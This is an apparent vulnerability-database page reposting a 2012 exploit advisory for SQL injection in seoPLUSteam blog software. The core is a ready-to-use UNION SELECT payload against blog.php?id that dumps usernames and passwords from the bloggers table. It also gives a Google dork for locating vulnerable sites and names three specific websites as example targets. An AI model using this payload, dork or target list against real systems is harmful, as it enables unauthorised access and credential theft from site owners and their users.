seoPLUSteam SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047275 漏洞类型
发布时间 2012-06-14 更新时间 2012-06-14
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012060154
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
###########################################################################################################################################
# Exploit Title: seoPLUSteam SQL Injection
# Google Dork: "Developed by seoPLUSteam" & "blog.php?id=+seoPLUSteam"
# Date: 13/06/2012
# Author: Iranian_Dark_Coders_Team
# Site :  http://idc-team.net/
# Software Link: http://seoplusteam.com/
# Version: Last
###########################################################################################################################################
# SQL Page : blog.php?id=1
#
# Inject C0d3 :
blog.php?id=-1+union+select+1,unhex%28hex%28group_concat%28name,0x3A,pass%29%29%29,3,4,5,6,7,8,9,10,11,12+from+bloggers--
#
###########################################################################################################################################
# Example :
#
# http://vegasreview.us/blog.php?id=1'
# http://seoplusteam.com/blog.php?id=1'
# http://vancouverreview.ca/blog.php?id=1'
###########################################################################################################################################
# Special Thanks To : M.R.S.CO - DevilZone - Mr.Cicili - G3n3rall - Gh0ST -
Blak.King - TeVeN - All Of IDC-Team Members & .....
###########################################################################################################################################